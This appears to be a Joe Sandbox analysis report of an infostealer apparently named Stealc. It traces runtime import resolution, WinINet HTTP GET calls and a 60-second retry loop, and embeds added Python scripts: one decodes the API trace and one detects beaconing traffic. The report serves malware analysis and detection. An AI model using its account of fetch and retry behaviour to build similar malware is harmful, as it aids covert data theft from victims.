                                  • GetProcAddress.KERNEL32(75290000,012177E0), ref: 0072A0DA
                                  • GetProcAddress.KERNEL32(75290000,0122DCE8), ref: 0072A0F2
                                  • GetProcAddress.KERNEL32(75290000,01229AE0), ref: 0072A10A
                                  • GetProcAddress.KERNEL32(75290000,0122DD78), ref: 0072A123
                                  • GetProcAddress.KERNEL32(75290000,01217700), ref: 0072A13B
                                  • GetProcAddress.KERNEL32(73440000,0121C468), ref: 0072A160
                                  • GetProcAddress.KERNEL32(73440000,01217860), ref: 0072A179
                                  • GetProcAddress.KERNEL32(73440000,0121C5D0), ref: 0072A191
                                  • GetProcAddress.KERNEL32(73440000,0122DDC0), ref: 0072A1A9
                                  • GetProcAddress.KERNEL32(73440000,0122DE50), ref: 0072A1C2
                                  • GetProcAddress.KERNEL32(73440000,012179C0), ref: 0072A1DA
                                  • GetProcAddress.KERNEL32(73440000,01217960), ref: 0072A1F2
                                  • GetProcAddress.KERNEL32(73440000,0122DD90), ref: 0072A20B
                                  • GetProcAddress.KERNEL32(752C0000,01217980), ref: 0072A22C
                                  • GetProcAddress.KERNEL32(752C0000,012179E0), ref: 0072A244
                                  • GetProcAddress.KERNEL32(752C0000,0122DF10), ref: 0072A25D
                                  • GetProcAddress.KERNEL32(752C0000,0122DD60), ref: 0072A275
                                  • GetProcAddress.KERNEL32(752C0000,01217A40), ref: 0072A28D
                                  • GetProcAddress.KERNEL32(74EC0000,0121C2D8), ref: 0072A2B3
                                  • GetProcAddress.KERNEL32(74EC0000,0121C5F8), ref: 0072A2CB
                                  • GetProcAddress.KERNEL32(74EC0000,0122DDD8), ref: 0072A2E3
                                  • GetProcAddress.KERNEL32(74EC0000,01217A60), ref: 0072A2FC
                                  • GetProcAddress.KERNEL32(74EC0000,01217A00), ref: 0072A314
                                  • GetProcAddress.KERNEL32(74EC0000,0121C648), ref: 0072A32C
                                  • GetProcAddress.KERNEL32(75BD0000,0122DD00), ref: 0072A352
                                  • GetProcAddress.KERNEL32(75BD0000,01217A80), ref: 0072A36A
                                  • GetProcAddress.KERNEL32(75BD0000,01229A70), ref: 0072A382
                                  • GetProcAddress.KERNEL32(75BD0000,0122DE68), ref: 0072A39B
                                  • GetProcAddress.KERNEL32(75BD0000,0122DEB0), ref: 0072A3B3
                                  • GetProcAddress.KERNEL32(75BD0000,012179A0), ref: 0072A3CB
                                  • GetProcAddress.KERNEL32(75BD0000,01217800), ref: 0072A3E4
                                  • GetProcAddress.KERNEL32(75BD0000,0122DEE0), ref: 0072A3FC
                                  • GetProcAddress.KERNEL32(75BD0000,0122DF40), ref: 0072A414
                                  • GetProcAddress.KERNEL32(75A70000,01217900), ref: 0072A436
                                  • GetProcAddress.KERNEL32(75A70000,0122DDA8), ref: 0072A44E
                                  • GetProcAddress.KERNEL32(75A70000,0122DCB8), ref: 0072A466
                                  • GetProcAddress.KERNEL32(75A70000,0122DEF8), ref: 0072A47F
                                  • GetProcAddress.KERNEL32(75A70000,0122DE38), ref: 0072A497
                                  • GetProcAddress.KERNEL32(75450000,012178C0), ref: 0072A4B8
                                  • GetProcAddress.KERNEL32(75450000,01217AA0), ref: 0072A4D1
                                  • GetProcAddress.KERNEL32(75DA0000,01217740), ref: 0072A4F2
                                  • GetProcAddress.KERNEL32(75DA0000,0122DE80), ref: 0072A50A
                                  • GetProcAddress.KERNEL32(6F070000,012177A0), ref: 0072A530
                                  • GetProcAddress.KERNEL32(6F070000,01217720), ref: 0072A548
                                  • GetProcAddress.KERNEL32(6F070000,01217820), ref: 0072A560
                                  • GetProcAddress.KERNEL32(6F070000,0122DE98), ref: 0072A579
                                  • GetProcAddress.KERNEL32(6F070000,01217840), ref: 0072A591
                                  • GetProcAddress.KERNEL32(6F070000,01217760), ref: 0072A5A9
                                  • GetProcAddress.KERNEL32(6F070000,01217780), ref: 0072A5C2
                                  • GetProcAddress.KERNEL32(6F070000,012177C0), ref: 0072A5DA
                                  • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0072A5F1
                                  • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0072A607
                                  • GetProcAddress.KERNEL32(75AF0000,0122DE08), ref: 0072A629
                                  • GetProcAddress.KERNEL32(75AF0000,01229AD0), ref: 0072A641
                                  • GetProcAddress.KERNEL32(75AF0000,0122DEC8), ref: 0072A659
                                  • GetProcAddress.KERNEL32(75AF0000,0122DF28), ref: 0072A672
                                  • GetProcAddress.KERNEL32(75D90000,012178E0), ref: 0072A693
                                  • GetProcAddress.KERNEL32(6CFD0000,0122DF88), ref: 0072A6B4
                                  • GetProcAddress.KERNEL32(6CFD0000,01217880), ref: 0072A6CD
                                  • GetProcAddress.KERNEL32(6CFD0000,0122DF58), ref: 0072A6E5
                                  • GetProcAddress.KERNEL32(6CFD0000,0122DDF0), ref: 0072A6FD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                   • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: HttpQueryInfoA$InternetSetOptionA
                                  • API String ID: 2238633743-1775429166
                                  • Opcode ID: 070a3c753432340e154bfc68b50dbefced7a966f08a1eb2c1f96b4548eefa84b
                                  • Instruction ID: 75d489f7308162340692a4329e7bdf87710993ea5c09b901f57f59fc52acb285
                                  • Opcode Fuzzy Hash: 070a3c753432340e154bfc68b50dbefced7a966f08a1eb2c1f96b4548eefa84b
                                  • Instruction Fuzzy Hash: 6A620BB5928300AFC744DFAAED989663BF9F74C203714871AA709C3274D6399841FF5A

                                   Control-flow Graph
                                  control_flow_graph 1033 716280-71630b call 72a7a0 call 7147b0 call 72a740 InternetOpenA StrCmpCA 1040 716314-716318 1033->1040 1041 71630d 1033->1041 1042 716509-716525 call 72a7a0 call 72a800 * 2 1040->1042 1043 71631e-716342 InternetConnectA 1040->1043 1041->1040 1061 716528-71652d 1042->1061 1044 716348-71634c 1043->1044 1045 7164ff-716503 InternetCloseHandle 1043->1045 1047 71635a 1044->1047 1048 71634e-716358 1044->1048 1045->1042 1050 716364-716392 HttpOpenRequestA 1047->1050 1048->1050 1053 7164f5-7164f9 InternetCloseHandle 1050->1053 1054 716398-71639c 1050->1054 1053->1045 1056 7163c5-716405 HttpSendRequestA HttpQueryInfoA 1054->1056 1057 71639e-7163bf InternetSetOptionA 1054->1057 1059 716407-716427 call 72a740 call 72a800 * 2 1056->1059 1060 71642c-71644b call 728940 1056->1060 1057->1056 1059->1061 1066 7164c9-7164e9 call 72a740 call 72a800 * 2 1060->1066 1067 71644d-716454 1060->1067 1066->1061 1071 7164c7-7164ef InternetCloseHandle 1067->1071 1072 716456-716480 InternetReadFile 1067->1072 1071->1053 1076 716482-716489 1072->1076 1077 71648b 1072->1077 1076->1077 1080 71648d-7164c5 call 72a9b0 call 72a8a0 call 72a800 1076->1080 1077->1071 1080->1072
                                  APIs
                                    • Part of subcall function 0072A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0072A7E6
                                    • Part of subcall function 007147B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00714839
                                    • Part of subcall function 007147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00714849
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                  • InternetOpenA.WININET(00730DFE,00000001,00000000,00000000,00000000), ref: 007162E1
                                  • StrCmpCA.SHLWAPI(?,0122F5C8), ref: 00716303
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00716335
                                  • HttpOpenRequestA.WININET(00000000,GET,?,0122E9C8,00000000,00000000,00400100,00000000), ref: 00716385
                                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007163BF
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007163D1
                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 007163FD
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0071646D
                                  • InternetCloseHandle.WININET(00000000), ref: 007164EF
                                  • InternetCloseHandle.WININET(00000000), ref: 007164F9
                                  • InternetCloseHandle.WININET(00000000), ref: 00716503
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                  • String ID: ERROR$ERROR$GET
                                  • API String ID: 3749127164-2509457195
                                  • Opcode ID: 2e2c060a4101ec7e0b8d3dadfebfa59bb88b961654829f71a3db6b7c84f15a87
                                  • Instruction ID: 3b6aeb15c9c548ab2976c11a88ce2f31e5d331f218c3cb237ed8db14aa36f4d6
                                  • Opcode Fuzzy Hash: 2e2c060a4101ec7e0b8d3dadfebfa59bb88b961654829f71a3db6b7c84f15a87
                                  • Instruction Fuzzy Hash: AA715B71A10318EBDB24DBA4DC59BEE77B8FB44701F108198F50A6B1D0DBB86A85CF51
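The two records above, the resolver at 729c10 that pulls its imports through LoadLibraryA and GetProcAddress, and the fetch routine at 716280 that issues the GET, are easier to read once the listing is parsed instead of eyeballed. The script below is an added example and not part of the Joe Sandbox report: it parses the report's own APIs lines (the sample input is a subset copied from the two records), counts GetProcAddress calls per module handle, keeps the names that survive in clear text, and decodes the WinINet constants the fetch routine passes. The constant names come from wininet.h; reading an 8-hex-digit name argument as a pointer to a string built at run time, and mapping handle 6F070000 to wininet.dll, are inferences from the listing, not statements the report makes.

```python
"""Parse Joe Sandbox "APIs" lines, summarise the 729c10 import resolver and
decode the WinINet constants of the 716280 fetch routine. Added example, not
part of the report; the sample lines below are copied from the two records."""
import re
from collections import defaultdict

# Api.MODULE(arg,...), ref: ADDR, with optional bullet and "Part of subcall" prefix
API_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")   # a raw 32-bit pointer or value in the listing

def parse_api_lines(text):
    """One dict per recognised call; lines that are not API calls are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            calls.append({"api": m["api"], "module": m["mod"], "subcall": m["sub"],
                          "args": [a.strip() for a in m["args"].split(",")],
                          "ref": int(m["ref"], 16)})
    return calls

def summarize_resolver(calls):
    """Count GetProcAddress per module handle and keep names passed in clear text.
    An 8-hex-digit name argument is a pointer the sandbox did not dereference,
    which is how a name assembled at run time shows up here (inference)."""
    per_handle = defaultdict(lambda: {"count": 0, "cleartext": []})
    loads = 0
    for c in calls:
        if c["api"] == "LoadLibraryA":
            loads += 1
        elif c["api"] == "GetProcAddress" and len(c["args"]) >= 2:
            handle, name = c["args"][0], c["args"][1]
            per_handle[handle]["count"] += 1
            if name != "?" and not HEX8.match(name):
                per_handle[handle]["cleartext"].append(name)
    return loads, dict(per_handle)

# Constants from wininet.h, limited to what this routine uses or may OR in.
OPEN_TYPES = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT",
              3: "INTERNET_OPEN_TYPE_PROXY"}
SERVICES = {1: "INTERNET_SERVICE_FTP", 3: "INTERNET_SERVICE_HTTP"}
OPTIONS = {31: "INTERNET_OPTION_SECURITY_FLAGS"}
QUERIES = {19: "HTTP_QUERY_STATUS_CODE"}
REQUEST_FLAGS = {0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
                 0x00000200: "INTERNET_FLAG_NO_UI",
                 0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
                 0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
                 0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT",
                 0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
                 0x00800000: "INTERNET_FLAG_SECURE",
                 0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
                 0x80000000: "INTERNET_FLAG_RELOAD"}

def hexint(s):
    return int(s, 16) if HEX8.match(s) else None

def decode_flags(value):
    """Names of the known bits in ascending order, plus any unknown remainder."""
    names = [n for bit, n in sorted(REQUEST_FLAGS.items()) if value & bit]
    rest = value & ~sum(REQUEST_FLAGS) & 0xFFFFFFFF
    return names + ([f"0x{rest:08X}"] if rest else [])

def decode_http_fetch(calls):
    """Read the request shape off the WinINet calls; argument positions follow
    the documented prototypes and '?' marks a value the sandbox did not recover."""
    notes = {}
    for c in calls:
        a, api = c["args"], c["api"]
        if api == "InternetOpenA":
            notes["access_type"] = OPEN_TYPES.get(hexint(a[1]), a[1])
        elif api == "InternetConnectA":
            notes["service"] = SERVICES.get(hexint(a[5]), a[5])
        elif api == "HttpOpenRequestA":
            notes["verb"] = a[1]
            notes["request_flags"] = decode_flags(hexint(a[6]) or 0)
        elif api == "InternetSetOptionA":
            notes["option"] = OPTIONS.get(hexint(a[1]), a[1])
        elif api == "HttpQueryInfoA":
            notes["query"] = QUERIES.get(hexint(a[1]), a[1])
        elif api == "InternetReadFile":
            notes["read_chunk"] = hexint(a[2])
    return notes

# Sample input: a subset of the lines from the two records above.
SAMPLE = """
• GetProcAddress.KERNEL32(74DD0000,01217320), ref: 00729C2D
• GetProcAddress.KERNEL32(74DD0000,01217600), ref: 00729C45
• LoadLibraryA.KERNEL32(0122DB20,?,00725CA3,00730AEB,?,?,?,?,?,?,?,?,?,?,00730AEA,00730AE3), ref: 0072A03D
• LoadLibraryA.KERNEL32(0122DAA8,?,00725CA3,00730AEB,?,?,?,?,?,?,?,?,?,?,00730AEA,00730AE3), ref: 0072A04E
• GetProcAddress.KERNEL32(6F070000,012177A0), ref: 0072A530
• GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0072A5F1
• GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0072A607
  • Part of subcall function 007147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00714849
• InternetOpenA.WININET(00730DFE,00000001,00000000,00000000,00000000), ref: 007162E1
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00716335
• HttpOpenRequestA.WININET(00000000,GET,?,0122E9C8,00000000,00000000,00400100,00000000), ref: 00716385
• InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007163BF
• HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 007163FD
• InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0071646D
"""

if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE)
    print(summarize_resolver(calls))
    print(decode_http_fetch(calls))
```

Run over the full 729c10 record it reports 104 GetProcAddress calls across 13 handles and 8 LoadLibraryA calls, 43 of the resolutions against 74DD0000 before any library is loaded, and only two names (InternetSetOptionA, HttpQueryInfoA, both against 6F070000) in clear text. The 716280 record decodes to a direct (no proxy) HTTP GET over INTERNET_SERVICE_HTTP with INTERNET_FLAG_KEEP_CONNECTION and INTERNET_FLAG_PRAGMA_NOCACHE, an INTERNET_OPTION_SECURITY_FLAGS write of a DWORD the sandbox did not capture, a HTTP_QUERY_STATUS_CODE query, and 0x7CF-byte InternetReadFile chunks; the callers compare the result against the string ERROR.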

                                   Control-flow Graph
                                  control_flow_graph 1090 725510-725577 call 725ad0 call 72a820 * 3 call 72a740 * 4 1106 72557c-725583 1090->1106 1107 7255d7-72564c call 72a740 * 2 call 711590 call 7252c0 call 72a8a0 call 72a800 call 72aad0 StrCmpCA 1106->1107 1108 725585-7255b6 call 72a820 call 72a7a0 call 711590 call 7251f0 1106->1108 1134 725693-7256a9 call 72aad0 StrCmpCA 1107->1134 1138 72564e-72568e call 72a7a0 call 711590 call 7251f0 call 72a8a0 call 72a800 1107->1138 1124 7255bb-7255d2 call 72a8a0 call 72a800 1108->1124 1124->1134 1139 7256af-7256b6 1134->1139 1140 7257dc-725844 call 72a8a0 call 72a820 * 2 call 711670 call 72a800 * 4 call 726560 call 711550 1134->1140 1138->1134 1143 7257da-72585f call 72aad0 StrCmpCA 1139->1143 1144 7256bc-7256c3 1139->1144 1270 725ac3-725ac6 1140->1270 1163 725991-7259f9 call 72a8a0 call 72a820 * 2 call 711670 call 72a800 * 4 call 726560 call 711550 1143->1163 1164 725865-72586c 1143->1164 1148 7256c5-725719 call 72a820 call 72a7a0 call 711590 call 7251f0 call 72a8a0 call 72a800 1144->1148 1149 72571e-725793 call 72a740 * 2 call 711590 call 7252c0 call 72a8a0 call 72a800 call 72aad0 StrCmpCA 1144->1149 1148->1143 1149->1143 1249 725795-7257d5 call 72a7a0 call 711590 call 7251f0 call 72a8a0 call 72a800 1149->1249 1163->1270 1170 725872-725879 1164->1170 1171 72598f-725a14 call 72aad0 StrCmpCA 1164->1171 1179 7258d3-725948 call 72a740 * 2 call 711590 call 7252c0 call 72a8a0 call 72a800 call 72aad0 StrCmpCA 1170->1179 1180 72587b-7258ce call 72a820 call 72a7a0 call 711590 call 7251f0 call 72a8a0 call 72a800 1170->1180 1200 725a16-725a21 Sleep 1171->1200 1201 725a28-725a91 call 72a8a0 call 72a820 * 2 call 711670 call 72a800 * 4 call 726560 call 711550 1171->1201 1179->1171 1275 72594a-72598a call 72a7a0 call 711590 call 7251f0 call 72a8a0 call 72a800 1179->1275 1180->1171 1200->1106 1201->1270 1249->1143 1275->1171
                                  APIs
                                    • Part of subcall function 0072A820: lstrlen.KERNEL32(00714F05,?,?,00714F05,00730DDE), ref: 0072A82B
                                    • Part of subcall function 0072A820: lstrcpy.KERNEL32(00730DDE,00000000), ref: 0072A885
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00725644
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 007256A1
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00725857
                                    • Part of subcall function 0072A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0072A7E6
                                    • Part of subcall function 007251F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00725228
                                    • Part of subcall function 0072A8A0: lstrcpy.KERNEL32(?,00730E17), ref: 0072A905
                                    • Part of subcall function 007252C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00725318
                                    • Part of subcall function 007252C0: lstrlen.KERNEL32(00000000), ref: 0072532F
                                    • Part of subcall function 007252C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00725364
                                    • Part of subcall function 007252C0: lstrlen.KERNEL32(00000000), ref: 00725383
                                    • Part of subcall function 007252C0: lstrlen.KERNEL32(00000000), ref: 007253AE
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0072578B
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00725940
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00725A0C
                                  • Sleep.KERNEL32(0000EA60), ref: 00725A1B
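The loop at 725510 has a single delay on its back edge: Sleep.KERNEL32(0000EA60), that is 60 000 ms, taken on one outcome of the last StrCmpCA against ERROR before control returns to 72557c. On the wire that is a request to the same server roughly every 60 s plus network time, for as long as the loop keeps retrying. The detector below is an added example, not from the report or from the Stealc code base: it reads constructed proxy log lines (placeholder client addresses and a reserved .example host), groups requests by client and URL, and reports series whose median inter-request gap lies within a tolerance of the 60 s period. The log format, the 5 % tolerance and the minimum of four requests are choices made for this example.

```python
"""Fixed-period beacon check derived from Sleep(0xEA60) in the 725510 loop.
Added example; log lines, addresses and host names are constructed."""
from collections import defaultdict
from datetime import datetime
from statistics import median

SLEEP_MS = 0xEA60                    # Sleep.KERNEL32(0000EA60) at 00725A1B
EXPECTED_PERIOD = SLEEP_MS / 1000    # 60.0 s between retries

def parse_proxy_line(line):
    """Constructed format: '<naive ISO timestamp> <client> <method> <url> <status> <bytes>'."""
    ts, client, method, url, status, size = line.split()
    return datetime.fromisoformat(ts), client, method, url, int(status), int(size)

def find_beacons(lines, period=EXPECTED_PERIOD, tolerance=0.05, min_requests=4):
    """Return {(client, url): median gap in seconds} for request series whose
    median spacing is within +/- tolerance of the period. The median is used
    rather than the mean so one slow reply or retransmit does not hide the cadence."""
    series = defaultdict(list)
    for line in lines:
        ts, client, _method, url, _status, _size = parse_proxy_line(line)
        series[(client, url)].append(ts)
    hits = {}
    for key, stamps in series.items():
        if len(stamps) < min_requests:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        gap = median(gaps)
        if abs(gap - period) <= tolerance * period:
            hits[key] = round(gap, 1)
    return hits

# Constructed log lines: 10.0.0.5 retries one URL about every 60 s and receives a
# 5-byte body (the length of "ERROR"); 10.0.0.6 is ordinary browsing; 10.0.0.7
# polls every 30 s, which a 60 s rule must not match.
SAMPLE_LOG = """\
2024-09-27T12:00:00.000 10.0.0.5 GET http://c2.example/ 200 5
2024-09-27T12:00:05.000 10.0.0.6 GET http://cdn.example/app.js 200 48211
2024-09-27T12:00:07.200 10.0.0.6 GET http://cdn.example/app.js 304 0
2024-09-27T12:01:00.400 10.0.0.5 GET http://c2.example/ 200 5
2024-09-27T12:02:00.200 10.0.0.5 GET http://c2.example/ 200 5
2024-09-27T12:03:00.700 10.0.0.5 GET http://c2.example/ 200 5
2024-09-27T12:03:40.000 10.0.0.6 GET http://cdn.example/app.js 304 0
2024-09-27T12:04:00.500 10.0.0.5 GET http://c2.example/ 200 5
2024-09-27T12:05:00.000 10.0.0.7 GET http://c2.example/ 200 5
2024-09-27T12:05:30.000 10.0.0.7 GET http://c2.example/ 200 5
2024-09-27T12:06:00.000 10.0.0.7 GET http://c2.example/ 200 5
2024-09-27T12:06:30.000 10.0.0.7 GET http://c2.example/ 200 5
2024-09-27T12:10:02.000 10.0.0.6 GET http://cdn.example/app.js 304 0
""".splitlines()

if __name__ == "__main__":
    for (client, url), gap in find_beacons(SAMPLE_LOG).items():
        print(f"{client} -> {url}: median gap {gap} s")
```

The tolerance absorbs the jitter that DNS, TCP setup and the server's response time add on top of the fixed Sleep; widen it, or add a second pass with the period halved, if the same sample is run on a slower link. Which branch of the final StrCmpCA takes the Sleep is not stated in the listing, so the rule is written for the observable (a constant 60 s cadence), not for the response text.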
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                   • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen$Sleep
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 507064821-2791005934
                                  • Opcode ID: f5d5d5cda3366e57d44659912d8b0aa989319d6c44a8c86c5d732f9931c3b16a
                                  • Instruction ID: c55dd50daadd6367e0b18bdd51f50438240c610581e93b1b788750c3cb701db7
                                  • Opcode Fuzzy Hash: f5d5d5cda3366e57d44659912d8b0aa989319d6c44a8c86c5d732f9931c3b16a
                                  • Instruction Fuzzy Hash: FBE12071910218EBDB15FBA0FC5AEED7379AF54300F508128F50666192EF3C6B49CB96

                                  Control-flow Graph

                                  control_flow_graph 1301 7217a0-7217cd call 72aad0 StrCmpCA 1304 7217d7-7217f1 call 72aad0 1301->1304 1305 7217cf-7217d1 ExitProcess 1301->1305 1309 7217f4-7217f8 1304->1309 1310 7219c2-7219cd call 72a800 1309->1310 1311 7217fe-721811 1309->1311 1313 721817-72181a 1311->1313 1314 72199e-7219bd 1311->1314 1316 721932-721943 StrCmpCA 1313->1316 1317 721913-721924 StrCmpCA 1313->1317 1318 721970-721981 StrCmpCA 1313->1318 1319 7218f1-721902 StrCmpCA 1313->1319 1320 721951-721962 StrCmpCA 1313->1320 1321 721835-721844 call 72a820 1313->1321 1322 72187f-721890 StrCmpCA 1313->1322 1323 72185d-72186e StrCmpCA 1313->1323 1324 721821-721830 call 72a820 1313->1324 1325 721849-721858 call 72a820 1313->1325 1326 7218cf-7218e0 StrCmpCA 1313->1326 1327 72198f-721999 call 72a820 1313->1327 1328 7218ad-7218be StrCmpCA 1313->1328 1314->1309 1343 721945-721948 1316->1343 1344 72194f 1316->1344 1341 721930 1317->1341 1342 721926-721929 1317->1342 1348 721983-721986 1318->1348 1349 72198d 1318->1349 1339 721904-721907 1319->1339 1340 72190e 1319->1340 1345 721964-721967 1320->1345 1346 72196e 1320->1346 1321->1314 1333 721892-72189c 1322->1333 1334 72189e-7218a1 1322->1334 1331 721870-721873 1323->1331 1332 72187a 1323->1332 1324->1314 1325->1314 1337 7218e2-7218e5 1326->1337 1338 7218ec 1326->1338 1327->1314 1335 7218c0-7218c3 1328->1335 1336 7218ca 1328->1336 1331->1332 1332->1314 1353 7218a8 1333->1353 1334->1353 1335->1336 1336->1314 1337->1338 1338->1314 1339->1340 